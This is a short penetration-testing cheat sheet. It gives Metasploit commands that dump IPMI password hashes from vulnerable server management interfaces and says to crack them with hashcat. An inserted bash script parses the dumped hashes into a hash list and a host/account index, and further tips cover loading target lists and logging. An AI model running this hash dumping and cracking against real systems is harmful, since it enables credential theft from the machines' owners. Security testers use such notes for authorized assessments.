metasploit (msf)
Grab IPMI hashes from vulnerable systems
msf
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhost ip.for.vulnerable.ipmi-interface
set OUTPUT_HASHCAT_FILE /tmp/ipmi.hashcat
run
Open the /tmp/ipmi.hashcat file and remove any IP or user information. For example, if your file looks like this...
192.168.1.5 ADMIN:c28f........
...trim it down so it's just:
c28f........
Then crack with hashcat.
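When the file covers several hosts, trimming by hand also throws away which hash belongs to which interface. The script below is an added example, not part of the original notes: it assumes every line follows the IP USER:hash layout shown above and writes the trimmed hashes plus a host/user index (the function and file names are hypothetical).

```shell
#!/usr/bin/env bash
# Added example, not from the original page. Assumes every line of the output
# file follows the "IP USER:hash" layout of the sample line above.

# split_ipmi_hashes INPUT HASHES_OUT INDEX_OUT
#   HASHES_OUT: hash field only, one per line (the trimmed form shown above)
#   INDEX_OUT : host<TAB>user<TAB>hash, so a recovered password can be traced
#               back to the BMC and account that need a new one
# Prints the number of hashes written; malformed lines are counted on stderr.
split_ipmi_hashes() {
  local in="$1" hashes="$2" idx="$3"
  : > "$hashes"; : > "$idx"            # create both files even if nothing matches
  awk -v hashes="$hashes" -v idx="$idx" '
    { sub(/\r$/, "") }                 # tolerate CRLF line endings
    /^[[:space:]]*$/ { next }          # ignore blank lines
    {
      sp = index($0, " ")              # first space ends the IP field
      rest = substr($0, sp + 1)
      co = index(rest, ":")            # first colon ends the user field
      if (sp < 2 || co < 2) { skipped++; next }
      hash = substr(rest, co + 1)      # later colons stay part of the hash
      if (hash == "") { skipped++; next }
      print hash > hashes
      print substr($0, 1, sp - 1) "\t" substr(rest, 1, co - 1) "\t" hash > idx
      written++
    }
    END {
      if (skipped) print skipped " malformed line(s) skipped" > "/dev/stderr"
      print written + 0
    }
  ' "$in"
}

# Constructed sample input (documentation addresses, made-up hash values).
demo_split() {
  local dir; dir=$(mktemp -d)
  printf '%s\n' \
    '192.0.2.10 ADMIN:aaaa1111:bbbb2222' \
    '' \
    '192.0.2.11 root:cccc3333' \
    'not-a-hash-line' > "$dir/ipmi.hashcat"
  split_ipmi_hashes "$dir/ipmi.hashcat" "$dir/hashes.txt" "$dir/index.tsv"
  cat "$dir/index.tsv"
  rm -rf "$dir"
}

# Run the demo only when executed with --demo, so sourcing stays side-effect free.
if [ "${1:-}" = "--demo" ]; then demo_split; fi
```

Keep the index file with the engagement notes; it is what ties a weak password back to a specific interface and account.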
Setting RHOSTS to a file
set rhosts file:/path/to/file
Turn logging/spooling on
spool /tmp/spooly.log